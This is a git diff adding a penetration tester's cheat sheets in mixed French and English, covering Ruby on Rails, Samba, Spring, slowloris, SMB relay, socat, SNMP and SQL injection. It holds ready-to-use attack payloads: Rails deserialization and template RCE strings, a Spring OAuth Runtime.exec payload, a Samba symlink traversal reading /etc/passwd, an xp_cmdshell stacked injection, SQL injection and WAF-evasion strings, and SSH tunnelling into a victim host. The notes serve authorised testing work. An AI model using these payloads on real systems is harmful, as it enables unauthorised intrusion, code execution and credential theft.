+POST {"listing":{"directions":[{"test":[{"abc":"#{1+1}"}]}] }} => abc: ! ‘2’
+POST {“listing”:{“directions”:[{“test”:[{“abc”:”#{%x[‘ls’]}+foo”}]}] }} => rce
+
+# reset pw
+session[params[:token]] # there will always be session_id and _csrf_token in the session dictionary
+https://gist.github.com/joernchen/9dfa57017b4732c04bcc http://www.akitaonrails.com/2014/08/28/small-bite-session-injection-challenge
+
+# Action Pack vuln: insecure deserialisation when sending YAML within a XML or JSON request
+https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156 # XML+YAML
+http://www.insinuator.net/2013/01/rails-yaml/
+http://ronin-ruby.github.io/blog/2013/01/09/rails-pocs.html
+https://community.rapid7.com/community/metasploit/blog/2013/01/29/exploit-for-ruby-on-rails-cve-2013-0333 # JSON+YAML
+http://ronin-ruby.github.io/blog/2013/01/28/new-rails-poc.html
+https://charlie.bz/blog/rails-3.2.10-remote-code-execution
+https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156 # walkthrough using the msf scanner and exploit modules
+
+* CVE-2013-0156 (YAML)
+https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
+Versions Affected:  ALL
+Fixed Versions:     3.2.11, 3.1.10, 3.0.19, 2.3.15 
+
+* CVE-2013-0333 (JSON)
+https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
+Versions Affected:  2.3.x, 3.0.x
+Not Affected:       3.1.x, 3.2.x, applications using the yaml gem.
+Fixed Versions:     3.0.20, 2.3.16 
+
+To test using a page with no body:
+pick a GET request and change it to a POST request
+add X-HTTP-Method-Override: GET
+  - xml/yaml
+change Content-Type: application/xml
+payload                         | vuln | not vuln
+-------------------------------------------------
+<a type="string">blah</a>       | 200  | 200
+<a type="yaml">valid yaml</a>   | 200  | 500
+<a type="yaml">invalid yaml</a> | 500  | 500
+
+  - json/yaml
+change Content-Type: application/json
+payload          | vuln | not vuln
+----------------------------------
+{"asdf": "asdf"} | 200  | 200
+--- {}           | 200  | 500
+invalid yaml     | 500  | 500
+
+To test using on a page with an existing body: 
+if body is: user[firstname]=david&user[lastname]=...
+change to xml with: curl -v 'http://192.168.122.224:3000/products?authenticity_token=F8...' -d '<user><firstname type="string">david</firstname></user>' -H 'Content-Type: application/xml'
+if there's authenticity_token in the body, I can move it into the query string
+if there's _method=PUT in the request, I can move it into headers => X-HTTP-Method-Override: PUT # rack/test/spec_methodoverride.rb
+
+look at msf exploits
+
+plop = "salut"
+require 'yaml'
+YAML.dump(plop)
+=> "--- salut\n...\n"
+
+# audit source code / checklist of things to check
+brakeman
+
+# regular expressions are multi-lines by default
+/^\d+$/ will match "arbitrary data\n123\narbitrary data"
+
+# rack
+Rack is used by almost all Ruby web frameworks, such as RoR and Sinatra
+* rack cookies
+rack.session=BAh
+_brainfit_session=BAh  // brainfit is the name of the app: rails new brainfit
+
+decode cookie using pentesterlab's script rack_cookie.rb
+
+si c'est du rails4 alors le cookie est chiffre
+
+# fingerprint
+Rails often runs on top of the Apache, NginX, Thin, and WEBrick servers
+Rails may be only be accessible at a certain path, such as /forum or /redmine
+Rails may be listening on a non-standard port, such as 3000, 4567, or 8888
+
+X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
+X-Rack-Cache: miss
+Set-Cookie: _appname_session=(base64)%3D%3D--(hexadecimal)
+
+# csrf bypass CVE-2011-0447
+http://weblog.rubyonrails.org/2011/2/8/csrf-protection-bypass-in-ruby-on-rails/
+
+# rails tuto
+http://guides.rubyonrails.org/getting_started.html
+
+# login bypass in rails restful_authentication plugin (28/10/2007)
+/activate/?activation_code= => SELECT * FROM users WHERE (users.`activation_code` IS NULL) LIMIT 1 // and login w/o password as the first account 
+http://www.rorsecurity.info/2007/10/28/restful_authentication-login-security/
+
+# install rails
+https://wiki.archlinux.org/index.php/Ruby_on_Rails
+
+# install vuln rails
+gem install rails -v 3.2.10
+rails new blog
+rails g controller products
+echo 'resources :products' >> config/routes.rb
+echo -e 'skip_before_filter :verify_authenticity_token\ndef create\np params\nend' >> app/controllers/products_controller.rb // add config.relative_url_root = "" for rails-3.0.x
+echo '<h1>hello</h1><%= params %>' >> app/views/products/create.erb
+rails server -b 0.0.0.0
+
+# rvm
+* switch to another version
+source $(rvm 2.1.5 do rvm env --path)
+
+# rubygems
+https://wiki.archlinux.org/index.php/Ruby
+gem list
+gem spec rubydns
+gem list --remote rubydns
+gem install rubydns --no-rdoc --no-ri
+gem install rails -v 3.2.10
+gem update
+
+gem install bundler
+export GEM_HOME=~/.gem/ruby/2.0.0
+export PATH=$PATH:$GEM_HOME/bin
+bundle install # reads deps' versions from Gemfile
diff --git a/Cheat Sheet/rxvt b/Cheat Sheet/rxvt
new file mode 100644
index 0000000..8d7dd46
--- /dev/null
+++ b/Cheat Sheet/rxvt	
@@ -0,0 +1,7 @@
+# rxvt
+
+#printf '\e]710;%s\007' "xft:Terminus:pixelsize=22"
+printf '\e]710;%s\007' "xft:Monospace:pixelsize=22"
+printf '\e]39;%s\007' "black"
+printf '\e]49;%s\007' "white"
+http://www.usf.uni-osnabrueck.de/infoservice/doc/localhtml/rxvt/refer.html#Sequences mais vaut mieux lire le man qui est plus complet
diff --git a/Cheat Sheet/samba b/Cheat Sheet/samba
new file mode 100644
index 0000000..d8c5943
--- /dev/null
+++ b/Cheat Sheet/samba	
@@ -0,0 +1,41 @@
+# samba
+
+# anonymous writable share
+cat > /etc/samba/smb.conf <<EOF
+[global]
+    log file = /var/log/samba/log
+    dns proxy = No
+    netbios name = SMBSERVER1337
+    server string = Samba Server
+    socket options = TCP_NODELAY
+    workgroup = TEST
+    os level = 20
+    max log size = 50
+    interfaces = lo virbr0 eth0
+    bind interfaces only = yes
+    map to guest = Bad User
+
+[l]
+    comment = L
+    path = /tmp/l
+    browseable = yes
+    writeable = yes
+    create mask = 444
+    guest ok = yes
+EOF
+
+# symlink (http://marc.info/?l=full-disclosure&m=126538598820903&w=2)
+smbclient -U'%' //1.2.3.4/blah
+symlink ../../../../../../../ tst
+more tst/etc/passwd
+posix_unlink lol or mount -t cifs and rm tst
+
+# rce dlopen CVE-2017-7494
+msf
+
+# download directory
+lcd blah
+cd blah
+prompt
+recurse
+mget *
diff --git a/Cheat Sheet/sap b/Cheat Sheet/sap
new file mode 100644
index 0000000..a1bbd7c
--- /dev/null
+++ b/Cheat Sheet/sap	
@@ -0,0 +1,10 @@
+# sap
+
+# opensource bizploit framework (based on sapyto)
+www.onapsis.com
+
+# autre outil
+ESNC
+
+# talk recent
+http://www.slideshare.net/phdays/dmitry-gutsko
diff --git a/Cheat Sheet/scada b/Cheat Sheet/scada
new file mode 100644
index 0000000..d2d1e98
--- /dev/null
+++ b/Cheat Sheet/scada	
@@ -0,0 +1,10 @@
+# scada
+
+capteurs/compteurs <- PLC -> station de controle (os win)
+stuxnet visait systeme windows avec SIMATIC WinCC SCADA ou PCS7 et S7-PLC, logiciels qui controlent des PLC de type Siemens
+
+https://github.com/scadastrangelove/SCADAPASS
+
+# hsc newsletter
+http://www.hsc-news.com/archives/2007/000036.html
+http://www.hsc-news.com/archives/2008/000044.html
diff --git a/Cheat Sheet/scapy b/Cheat Sheet/scapy
new file mode 100644
index 0000000..8143dcc
--- /dev/null
+++ b/Cheat Sheet/scapy	
@@ -0,0 +1,27 @@
+# scapy
+
+ls() # list layers
+lsc() # high-level functions
+
+wireshark(pkts) 
+
+sr()
+sr1()
+
+fuzz()
+
+load_module("p0f")
+load_module("nmap")
+
+make_table # (comparer IPID, les routeurs traversés pour des machines voisines, etc)
+
+conf.checkIPaddr = False # don't check that replies come from the expected IP address
+multi=True # wait for more answer packets after the first response is received
+
+# TCP sequence number fingerprinting
+
+## afficher toutes les URL
+>>> raws = [r[Raw] for r in pkts if Raw in r]
+>>> urls = set([r.load.splitlines()[0].split(' ')[1] for r in raws if r.load.splitlines()[0].startswith('GET')])
+>>> print '\n'.join(urls)
+
diff --git a/Cheat Sheet/sccm b/Cheat Sheet/sccm
new file mode 100644
index 0000000..0c94c87
--- /dev/null
+++ b/Cheat Sheet/sccm	
@@ -0,0 +1,3 @@
+# sccm
+
+https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/
diff --git a/Cheat Sheet/scraper_crawler_spider b/Cheat Sheet/scraper_crawler_spider
new file mode 100644
index 0000000..1b18d87
--- /dev/null
+++ b/Cheat Sheet/scraper_crawler_spider	
@@ -0,0 +1,12 @@
+# scraper
+
+https://xato.net/passwords/understanding-password-dumps/
+Dumpmon
+Pystemon
+
+# web crawler/spider
+wget
+httrack
+heritix (web gui)
+crawler4j (faut ecrire une classe java)
+nutch (prereq tomcat?)
diff --git a/Cheat Sheet/screenshot b/Cheat Sheet/screenshot
new file mode 100644
index 0000000..dc7c9e4
--- /dev/null
+++ b/Cheat Sheet/screenshot	
@@ -0,0 +1,10 @@
+# screenshot webkit
+
+https://github.com/graphcool/chromeless
+http://w00tsec.blogspot.com.au/2014/08/scan-internet-screenshot-all-things.html
+
+https://github.com/dxa4481/Snapper
+http://cutycapt.sourceforge.net/
+https://github.com/paulhammond/webkit2png/
+https://github.com/eelsivart/vnc-screenshot
+https://bitbucket.org/LaNMaSteR53/peepingtom
diff --git a/Cheat Sheet/scrutinizer b/Cheat Sheet/scrutinizer
new file mode 100644
index 0000000..205cd9d
--- /dev/null
+++ b/Cheat Sheet/scrutinizer	
@@ -0,0 +1,3 @@
+# scrutinizer
+
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2012-014/
diff --git a/Cheat Sheet/selinux b/Cheat Sheet/selinux
new file mode 100644
index 0000000..d3ca289
--- /dev/null
+++ b/Cheat Sheet/selinux	
@@ -0,0 +1,28 @@
+# selinux
+
+# good intro
+http://fedoraproject.org/wiki/SELinux/Troubleshooting
+
+# activer les logs
+# https://wiki.gentoo.org/wiki/SELinux/Tutorials/Where_to_find_SELinux_permission_denial_details
+# tl;dr:
+  denials are logged in the avc.log (no audit daemon running) or audit.log (audit daemon running) log files
+  denials might be obscured through dontaudit statements, which you can disable using semodule -DB and re-enable through semodule -B
+  the denial logging gives you great detail about who (process information, including security context) is trying to do what (permission) against something (target information, including security context)
+
+semodule -DB # Turn on all AVC Messages for which SELinux currently is "dontaudit"ing.
+sealert -a /var/log/audit/audit.log > /tmp/mylogfile.txt # human readable logs, sealert -> yum install setroubleshoot-server
+
+
+~# cat > portage_noatsecure.te << EOF
+module portage_noatsecure 1.0;
+require {
+  type portage_t;
+  type setfiles_t;
+  class process { noatsecure };
+}
+allow portage_t setfiles_t:process { noatsecure };
+EOF
+~# checkmodule -m -o portage_noatsecure.mod portage_noatsecure.te
+~# semodule_package -o portage_noatsecure.pp -m portage_noatsecure.mod
+~# semodule -i portage_noatsecure.pp
diff --git a/Cheat Sheet/shadow b/Cheat Sheet/shadow
new file mode 100644
index 0000000..1faa94e
--- /dev/null
+++ b/Cheat Sheet/shadow	
@@ -0,0 +1,21 @@
+# password shadow
+
+# Redirection de port avec un compte dont le Shell est /bin/false 
+- dont le shell est un fichier executable par le compte
+- qui n'est pas verrouillé (user:*:9797 => non verrouillé, user:!:9797 => verrouillé)
+- la redirection de port est activé dans SSH
+- j'ai pu ajouter ma clef publique dans son .ssh/authorized_keys (ou .ssh/authorized_keys2)
+
+=> Alors il est possible de faire:
+ssh -N -L 31337:127.0.0.1:1501 nobody@victim
+afin de se connecter sur la base oracle qui n'ecoute qu'en local.
+
+# mes questions
+- si un compte est dans /etc/passwd mais pas dans /etc/shadow
+=> le compte est actif avec un mot de passe vide
+
+- quelle difference entre /bin/false et /bin/nologin ?
+=> man nologin et man false
+
+- gentoo: à quoi sert ce compte operator?
+=> je sais toujours pas...
diff --git a/Cheat Sheet/sharepoint b/Cheat Sheet/sharepoint
new file mode 100644
index 0000000..45cb71b
--- /dev/null
+++ b/Cheat Sheet/sharepoint	
@@ -0,0 +1,5 @@
+# sharepoint
+
+sparty.secniche.org
+
+https://github.com/sensepost/SPartan
diff --git a/Cheat Sheet/sip b/Cheat Sheet/sip
new file mode 100644
index 0000000..1ccfd0c
--- /dev/null
+++ b/Cheat Sheet/sip	
@@ -0,0 +1,3 @@
+# sip
+
+http://packetstormsecurity.com/files/107301/SIP-Army-Knife-Fuzzer-11232011.html
diff --git a/Cheat Sheet/sleuthkit b/Cheat Sheet/sleuthkit
new file mode 100644
index 0000000..9e74b89
--- /dev/null
+++ b/Cheat Sheet/sleuthkit	
@@ -0,0 +1,6 @@
+# sleuthkit
+
+# timeline
+fls -r -m C: sd-cons_c.dd >> sd-cons.body
+fls -r -m D: sd-cons_d.dd >> sd-cons.body
+mactime -d -b sd-cons.body -z GMT+2 > sd-cons.mactime
diff --git a/Cheat Sheet/slowloris b/Cheat Sheet/slowloris
new file mode 100644
index 0000000..ca9cbbf
--- /dev/null
+++ b/Cheat Sheet/slowloris	
@@ -0,0 +1,67 @@
+# slowloris
+
+http://ha.ckers.org/blog/20090617/slowloris-http-dos/
+http://isc.sans.org/diary.html?storyid=6601
+http://isc.sans.org/diary.html?storyid=6613
+
+Post de Adrian Ilarion Ciobanu datant de debut 2007 qui décrit parfaitement
+cette attaque de DoS (http://pub.mud.ro/~cia/computing/apache-httpd-denial-of-service-example.html)
+Elle a aussi été décrite en 2005 dans la section "Programming Model Attacks" de
+Apache Security
+
+Permet de mettre à mal un seul site web sans envoyer abondament du traffic TCP
+ou HTTP comme dans une attaque DoS typique.
+
+Seuls certains serveur web sont impactés 
+lighttpd 1.4.20 - vulnerable
+apache 2.2.11 - vulnerable
+sun web server - vulnerable
+
+squid - NOT vulnerable
+nginx 0.8.3 - NOT vulnerable
+cherokee 0.99.17 - NOT vulnerable
+
+C'est vraiment un DoS au niveau HTTP, si on a un Apache et un IIS sur la meme
+machine, le IIS ne sera pas affecté par l'attaque.
+
+* Principe de la technique
+Le client envoie interminablement des entetes bidons dans sa requete GET, ce
+qui accapare le serveur qui reste en attente de la ligne vide (^\r\n) qui
+marque la fin de la requete.
+Une seule connection peut accaparer un processus pendant 5' (par defaut la
+directive TimeOut est à 300s), après cela il doit ouvrir une nouvelle connexion.
+
+GET / HTTP/1.1\r\n
+Host: host\r\n
+User-Agent: Mozilla/4.0
+Content-Length: 42\r\n
+
+entete bidon => X-a: b\r\n
+
+* Attenuations et contre-mesures
+- load balancers ou reverse proxies: il est possible qu'on ne soit pas affecté,
+il faut vérifier son installation
+Frank Breedijk atteste que Slowloris est impuissant contre un equilibreur de charge Cisco CSS (http://www.cupfighter.net/index.php/2009/06/slowloris-css/)
+- la directive TimeOut: combien de temps Apache attend de recevoir une requete
+GET ou POST
+Mais meme si on diminue à 5s, il suffit de generer plus de traffic (2MB/min) =
+~45kb/sec ce qui sifnifie q'un abonné ADSL 512k est capable
+- module mod_limitipconn qui limite le nombre de connections pour 1 meme
+adresse IP
+Mais pb des utilisateurs derriere un proxy d'entreprise
+Et de toute façon cela stoppera un script kiddie mais pas un attaquant
+chevronné ayant à sa disposition une 12 de machines
+
+* important à savoir
+default number of connections is 256
+default TimeOut: 300 (5 minutes)
+
+When using the mpm_prefork module, Apache does not spawn new threads, it forks new
+processes instead. This is a lot more CPU consuming (because of context
+switching) and memory-consuming as well. Thus, raising the MaxClients can be
+devastating, it could trigger oom kills and/or make the system unresponsible.
+
+* commentaire de adrian qui resume bien les trolls
+every flaw takes a long walk until one will properly make it public and eventually do some marketing around it for a small profit (or big, depends on the players - see "the john doe helping cisco/microsoft to cover dns flaw" case). the usual path is a set of exploit rediscoveries until in the hands of the "real" exploiter. it was anoctopus - guys fed up when faced with bad justice probably as i interpret your text, it was apkill - dude fed up with low-brains/high-marketing-skills antiddos businesses (see http://pub.mud.ro/~cia/computing/apache-httpd-deni ... ) and it seems slowloris is the end of the line (see http://ha.ckers.org/blog/20090617/slowloris-http-d ... )
+welcome to the real world of IT sharks :)
+
diff --git a/Cheat Sheet/smbrelay b/Cheat Sheet/smbrelay
new file mode 100644
index 0000000..f0d5bab
--- /dev/null
+++ b/Cheat Sheet/smbrelay	
@@ -0,0 +1,24 @@
+# smb-relay smbrelay
+
+http://www.room362.com/blog/2014/05/21/effective-ntlm-slash-smb-relaying/
+http://www.josho.org/blog//blog/2014/06/20/snarf/ https://github.com/purpleteam/snarf # might not do http 
+http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
+
+impacket/smbrelayx.py supports NTLMv2 (msf smb_relay didnt in 04/2013)
+https://github.com/byt3bl33d3r/impacket/blob/master/examples/smbrelayx.py to exec commands on remote host
+
+can't relay to DCs due to SMB signing (turned on by default on DC)
+the .exe has to be a service exe, or a mof or a normal exe in Startup
+
+smbrelay3 (http://www.tarasco.org/security/smbrelay/ http://seclists.org/fulldisclosure/2008/Nov/302)
+  SMB  to SMB relay 
+  HTTP to SMB relay
+  SMTP to SMB relay
+  POP3 to SMB relay
+  IMAP to SMB relay
+http://squirtle.googlecode.com/
+zackattack
+
+ldaprelay
+https://github.com/CoreSecurity/impacket/issues/139 https://github.com/CoreSecurity/impacket/pull/163 https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py#L125
+
diff --git a/Cheat Sheet/smtp b/Cheat Sheet/smtp
new file mode 100644
index 0000000..ea85c11
--- /dev/null
+++ b/Cheat Sheet/smtp	
@@ -0,0 +1,8 @@
+# smtp
+
+vrfy <alias>
+expn <mailing list>
+
+ehlo relay.hsc.fr
+mail from:<blah@domain.com>
+rcpt to:<sme@hsc.fr>
diff --git a/Cheat Sheet/snmp b/Cheat Sheet/snmp
new file mode 100644
index 0000000..5183d99
--- /dev/null
+++ b/Cheat Sheet/snmp	
@@ -0,0 +1,18 @@
+# snmp
+
+pentoo-portage-trunk/snmpenum
+onesixyone (http://labs.portcullis.co.uk/tools/onesixtyone/)
+braa
+http://www.nothink.org/codes/snmpcheck/index.php
+
+# attention
+j'ai deja eu un service snmp qui repondait en v1 avec "private"  mais pas en v2
+
+# lister les users du domaine sur un DC
+snmpwalk -v1 -c public 172.10.10.100 1
+
+# lister les users dun windows
+snmpwalk -v1 -c public 1.2.3.4 1.3.6.1.4.1.77.1.2.25
+
+# lister la version/banner d'un windows ou device divers
+... 10.0.0.1 1.3.6.1.2.1.1.1.0
diff --git a/Cheat Sheet/socat b/Cheat Sheet/socat
new file mode 100644
index 0000000..df9d079
--- /dev/null
+++ b/Cheat Sheet/socat	
@@ -0,0 +1,34 @@
+# socat
+
+socat TCP4-LISTEN:8080,bind=192.168.122.1,reuseaddr,fork,su=nobody,range=192.168.122.1/32 OPENSSL:1.2.3.4:443,verify=0
+stunnel -c -d 127.0.0.2:80 -r 1.2.3.4:443 # fait peut etre la meme chose, à tester
+
+reuseaddr: allows immediate restart after master process's termination, even if some child sockets are not completely shut down
+bind: bind to a specific interface
+fork: fork a new process after each accept()
+su: su to user nobody after forking
+range=192.168.0.0/24: only permits connections from a private network
+
+# monter un reseau virtuel TUN 
+# ssl: http://www.dest-unreach.org/socat/doc/socat-openssltunnel.html
+root@server: socat -d -d TCP-L:11443,reuseaddr TUN:192.168.255.1/24,up
+root@client: socat -d -d TCP:192.168.0.13:11443 TUN:192.168.255.2/24,up
+
+# reutiliser la session SSL (et ne pas refaire le handshake)
+openssl s_client -connect 1.2.3.4:443 -ign_eof -quiet -sess_out ssl_session.ctx
+socat -d TCP4-L:9090,reuseaddr,fork exec:'openssl s_client -host 1.2.3.4 -port 443 -ign_eof -quiet -sess_in ssl_session.ctx' 2>/dev/null
+./wfuzz.py -c -z file -f ~/dico.txt --basic 'manager:FUZZ' --hc 401 http://127.0.0.1:9090/manager/html/
+
+# loggue les requetes HTTP et retourne une reponse HTTP statique
+socat TCP-LISTEN:80,fork,reuseaddr EXEC:'path/to/httplogger.py'
+socat openssl-listen:443,fork,reuseaddr,verify=0,cert=path/to/cert+key.pem EXEC:'path/to/httplogger.py' (verify=1 -> certificat client obligatoire)
+
+# sslmitm
+socat -v openssl-listen:8081,fork,reuseaddr,cert=cert.pem,key=key.pem,verify=0 tcp:127.0.0.1:3306
+socat -v tcp-l:3306,reuseaddr,fork openssl:1.2.3.4:443,verify=0
+/etc/init.d/dnsmasq start && less +F /tmp/dnsmasq.log
+
+# reverse socat to bf local services
+clt: socat -d tcp:mabox:1234,fork,interval=1,forever tcp:127.0.0.1:445
+moi: socat -v tcp-l:5555,reuseaddr,fork tcp-l:1234,reuseaddr
+puis bf avec 1 seul thread
diff --git a/Cheat Sheet/solaris b/Cheat Sheet/solaris
new file mode 100644
index 0000000..7dc2658
--- /dev/null
+++ b/Cheat Sheet/solaris	
@@ -0,0 +1,13 @@
+# solaris
+
+# EXTREMEPARR local root Solaris 7 - 11 (x86 & SPARC)
+https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh
+
+# telnet
+telnet -l"-froot"
+
+# sfw
+/opt/sfw/bin/wget,nc,ncat,netcat
+
+# public exploits
+https://github.com/0xdea/exploits/tree/master/solaris
diff --git a/Cheat Sheet/soql b/Cheat Sheet/soql
new file mode 100644
index 0000000..61a817a
--- /dev/null
+++ b/Cheat Sheet/soql	
@@ -0,0 +1,3 @@
+# soql
+
+http://corycowgill.blogspot.com.au/2011/01/sql-soql-injection.html
diff --git a/Cheat Sheet/sort b/Cheat Sheet/sort
new file mode 100644
index 0000000..4b4d53a
--- /dev/null
+++ b/Cheat Sheet/sort	
@@ -0,0 +1,8 @@
+# sort
+
+# sort by popularity
+cat pass.dic | sort | uniq -c | sort -k 1nr -k 2 | sed -e 's,^ *[0-9]\+ ,,'
+
+# pure
+unset LANG
+cat rockyou-75.txt | sed -e '/[^a-zA-Z]/d' | tr '[[:upper:]]' '[[:lower:]]' | tr -cd '\12\141-\172' | cut -b -8 > rockyou.pure 
diff --git a/Cheat Sheet/sourceforge b/Cheat Sheet/sourceforge
new file mode 100644
index 0000000..ed8868b
--- /dev/null
+++ b/Cheat Sheet/sourceforge	
@@ -0,0 +1,3 @@
+# sourceforge
+
+http://$PROJECTNAME.svn.sourceforge.net/svnroot/$PROJECTNAME/trunk
diff --git a/Cheat Sheet/sox b/Cheat Sheet/sox
new file mode 100644
index 0000000..badd691
--- /dev/null
+++ b/Cheat Sheet/sox	
@@ -0,0 +1,4 @@
+# sox
+
+export AUDIODRIVER=alsa
+play blah.[mp3|wav] trim 0.50 1.25
diff --git a/Cheat Sheet/splunk b/Cheat Sheet/splunk
new file mode 100644
index 0000000..d7a6d48
--- /dev/null
+++ b/Cheat Sheet/splunk	
@@ -0,0 +1,3 @@
+# splunk
+
+default creds: admin/changeme
diff --git a/Cheat Sheet/spring b/Cheat Sheet/spring
new file mode 100644
index 0000000..2d40b2f
--- /dev/null
+++ b/Cheat Sheet/spring	
@@ -0,0 +1,65 @@
+# SpringSource Spring Framework
+
+# http://en.wikipedia.org/wiki/Spring_Framework
+Spring Framework includes Spring Security (formely Acegi Security System for Spring)
+
+# all vulns
+http://support.springsource.com/security/springsource-all
+
+# mass assignment / autobinding
+http://agrrrdog.blogspot.com.au/2017/03/autobinding-vulns-and-spring-mvc.html
+
+# vulns
+* CVE-2010-1622 RCE
+http://blog.o0o.nu/2010/06/cve-2010-1622.html
+http://support.springsource.com/security/cve-2010-1622
+affected versions:
+- 3.0.0 to 3.0.2
+- 2.5.0 to 2.5.6.SEC01 (community releases)
+- 2.5.0 to 2.5.7 (subscription customers)
+- Earlier versions may also be affected
+
+* CVE-2011-2730 Info Disc
+http://support.springsource.com/security/cve-2011-2730
+fixed in 3.0.6
+
+* CVE-2011-2732
+header injection
+
+* CVE-2011-2894
+Spring Framework and Spring Security serialization-based remoting vulnerabilities
+http://support.springsource.com/security/cve-2011-2894 http://www.pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/
+affected version:
+- Spring Framework: 3.0.0 to 3.0.5
+- Spring Security: 3.0.0 to 3.0.5 and 2.0.0 to 2.0.6
+- Earlier, unsupported versions may also be affected
+
+* lots of vulns
+http://wouter.coekaerts.be/2011/spring-vulnerabilities
+
+* XXE (CVE-2013-4152 CVE-2013-6429 CVE-2013-7315)
+CVE-2013-4152: http://seclists.org/bugtraq/2013/Aug/154 http://www.gopivotal.com/security/cve-2013-4152 https://jira.spring.io/browse/SPR-10806
+affected versions:
+- 3.0.0 to 3.2.3 (Spring OXM & Spring MVC)
+- 4.0.0.M1 (Spring OXM)
+- 4.0.0.M1-4.0.0.M2 (Spring MVC)
+- Earlier unsupported versions may also be affected
+
+* Directory Traversal (CVE-2014-3578 and CVE-2014-3625 "incomplete fix")
+Spring Framework:
+- 3.0.4 to 3.2.11
+- 4.0.0 to 4.0.7
+- 4.1.0 to 4.1.1
+
+only exploitable if in web.xml:
+ - UrlResource
+<mvc:resources mapping="/css/**" location="file:webapps/springapp/WEB-INF/classes/theme/css/" />
+GET /springapp/css/file:/etc/passwd
+
+* CVE-2016-4977 RCE in Spring Security
+http://secalert.net/#CVE-2016-4977 vuln when using Whitelabel Error Page instead of custom error page
+redirect_uri=${777-111}
+redirect_uri=${T(java.lang.Runtime).getRuntime().exec("ls")}
+affected versions:
+Pivotal Spring Security OAuth 2.0 - 2.0.9
+Pivotal Spring Security OAuth 1.0 - 1.0.5
diff --git a/Cheat Sheet/sqli b/Cheat Sheet/sqli
new file mode 100644
index 0000000..793df56
--- /dev/null
+++ b/Cheat Sheet/sqli	
@@ -0,0 +1,244 @@
+# sqli
+
+# detection summary
+http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
+
+# evasion
+https://github.com/client9/libinjection/blob/master/data/sqli-rsalgado-bhusa2013.txt # good tricks
+http://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
+https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
+https://websec.files.wordpress.com/2010/11/sqli2.pdf
+
+# test sql 
+http://sqlfiddle.com/
+
+# cheatsheets
+http://www.sqlinjectionwiki.com/
+http://www.websec.ca/kb/sql_injection (was https://docs.google.com/document/d/1rO_LCBKJY0puvRhPhAfTD2iNVPfR4e9KiKDpDE2enMI/edit#heading=h.7343208e65c0)
+https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
+http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
+http://pentestmonkey.net/category/cheat-sheet/sql-injection
+http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
+sqli-cheatsheets
+
+# a lot of articles on sqli
+https://delicious.com/inquis/sqlinjection
+
+# tips
+?id=1 limit 0 union select login,password from users into outfile '/tmp/users'
+outfile OR dumpfile
+concat() OR concat_ws() OR group_concat() (all lines in one line)
+always use UNION ALL in order to preserve duplicate rows
+
+select top 1 (ou 2) 0,1,table_name COLLATE DATABASE_DEFAULT,2,3...
+ ou bien essayer:
+from thetable limit 1
+
+http://websec.ca/blog/view/Bypassing_WAFs_with_SQLMap
+
+twitter: "You can use %82 on MySQL 5 as a replacement for %2C when performing SQL injections"
+
+# extract the current running query
+http://www.contextis.com/resources/blog/sql-inception-how-select-yourself/
+
+# sqli labs
+https://github.com/Audi-1/sqli-labs
+
+# detect/confirm
+MySQL: 'serv' 'ices' / concat('adm','in')
+MSSQL: 'serv'+'ices'
+Oracle: 'serv'||'ices'
+Postgres: 'serv'||'ices'
+
+# time
+* MSSQL
+a' waitfot delay '0:0:10'--
+
+# stacked
+* MSSQL
+abc';waitfor delay '0:0:10'--
+123;exec xp_cmdshell 'ping 1.1.1.1';select 1 from (select 2 login) users // SELECT * FROM users WHERE login=$input ORDER BY login ASC
+
+# sqli optimisation using Range:
+-m POST -H 'Range: bytes=-1' -i 200
+
+# web for pentester II
+select * from users where username = 'doesntexist' or 'a'='a' and password = 'nobodyusedthispw' -> ( False ) OR ( True AND False) -> 0 result
+' or 'a'='a' limit 0,1 --%20
+username=asdf\&password=+and+'a'='a -> username = 'asdf\' and password=' and 'a'='a'
+&limit=4+procedure+analyse()
+&group=id+..
+
+## fingerprint db
+* sqlmap
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHR(99)&CHR(72)&CHR(108)&CHR(79) FROM MSysAccessObjects)=CHR(99)&CHR(72)&CHR(108)&CHR(79)
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHR(99)||CHR(72)||CHR(108)||CHR(79) FROM SYSIBM.SYSDUMMY1)=CHR(99)||CHR(72)||CHR(108)||CHR(79)
+[11:41:18] [PAYLOAD] 1 AND (SELECT 'cHlO' FROM RDB$DATABASE)='cHlO'
+[11:41:18] [PAYLOAD] 1 AND (SELECT 'cHlO' FROM VERSIONS)='cHlO'
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHAR(99)+CHAR(72)+CHAR(108)+CHAR(79))=CHAR(99)+CHAR(72)+CHAR(108)+CHAR(79)
+[11:41:18] [PAYLOAD] 1 AND (SELECT 0x63486c4f)=0x63486c4f
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHR(99)||CHR(72)||CHR(108)||CHR(79) FROM DUAL)=CHR(99)||CHR(72)||CHR(108)||CHR(79)
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHR(99)||CHR(72)||CHR(108)||CHR(79) FROM DUAL)=CHR(70)||CHR(114)||CHR(118)||CHR(71)
+
+* https://rdot.org/forum/showthread.php?t=118
+
+MySQL
+id=1+procedure+analyse()
+id=1+and+concat_ws(1,1)=1
+id=1+and+connection_id()=connection_id()
+
+MSSQL
+id=1+and+len(@@version)=len(@@version)
+id=1+and+(@@TEXTSIZE>@@LANGID)
+
+PostgerSQL
+id=1+and+1=1::int // Informix тоже держит такой синтаксис, но она крайне редка, так что пока оставлю
